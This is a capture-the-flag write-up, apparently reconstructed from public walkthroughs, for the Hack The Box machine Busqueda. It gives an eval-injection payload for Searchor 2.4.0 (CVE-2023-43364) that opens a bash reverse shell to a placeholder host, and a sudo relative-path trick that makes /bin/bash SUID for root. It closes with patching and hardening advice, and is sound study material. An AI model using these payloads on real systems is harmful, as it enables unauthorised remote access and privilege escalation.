Summary

This writeup is reconstructed from public walkthroughs (see Source attribution below). I have not personally rooted this box.

Busqueda is an Easy Linux box: Flask front-end uses Searchor 2.4.0 which calls eval() on the user query → RCE as svc. Privesc: sudo /opt/scripts/system-checkup.py runs ./full-checkup.sh from CWD without an absolute path → run from a writable dir → drop a full-checkup.sh that chmod +s /bin/bash → root.

The chain:

1. Search form: q='%2B__import__("os").system("bash -c ...")%2B' slips into eval(f"... {q} ...") inside Searchor 2.4.0 (CVE-2023-43364) → reverse shell as svc.
2. ~/.gitconfig + checked-out repo expose gitea admin creds; reuse for svc login.
3. sudo -l → (root) /opt/scripts/system-checkup.py *. First arg = a sub-command. Run with docker-ps from /tmp → script Popen(["./full-checkup.sh"], shell=False, cwd=...).
4. Drop /tmp/full-checkup.sh:

   #!/bin/bash
   chmod +s /bin/bash
   

   Run sudo invocation from /tmp. → root.

Recon

22/tcp     OpenSSH
80/tcp     Apache → searcher.htb (Flask + Searchor 2.4.0)

Foothold — Searchor eval injection

# Searchor 2.4.0 builds:
#   eval(f"Engine.{engine.title()}.search('{query}', copy_url=False, open_web=False)")
# Inject:
q = """', __import__('os').system('bash -c "bash -i >& /dev/tcp/<C2>/<p> 0>&1"'), '"""
requests.post('http://searcher.htb/search', data={'engine':'Bing','query':q})
# shell as svc

Privesc — sudo system-checkup.py + relative path

$ sudo -l
(root) NOPASSWD: /usr/bin/python3 /opt/scripts/system-checkup.py *

$ cat /opt/scripts/system-checkup.py
... if sys.argv[1] == 'full-checkup':
        subprocess.Popen(['./full-checkup.sh'])

$ cd /tmp
$ cat > full-checkup.sh <<'EOF'
#!/bin/bash
chmod +s /bin/bash
EOF
$ chmod +x full-checkup.sh
$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
$ /bin/bash -p
# root

Why each step worked

• Searchor 2.4.0 eval(): documented CVE-2023-43364; the library builds an f-string that interpolates user input directly into an eval argument.
• Relative-path subprocess: Popen(['./x']) resolves against CWD. Sudoers preserves CWD by default.

Counterfactuals

• Patch Searchor ≥ 2.4.2.
• In sudo’d scripts, always use absolute paths and an empty/sanitised PATH.
• For sudo entries, set cwd=/some/safe/dir in sudoers to pin CWD.

Source attribution

Reconstruction is grounded in:

• 0xdf, “HTB: Busqueda” — https://0xdf.gitlab.io/2023/08/12/htb-busqueda.html
• IppSec, “Busqueda” video walkthrough — https://ippsec.rocks/?#Busqueda
• Searchor CVE-2023-43364.

I have not personally rooted this box; the chain above is a study-guide reconstruction of those public sources.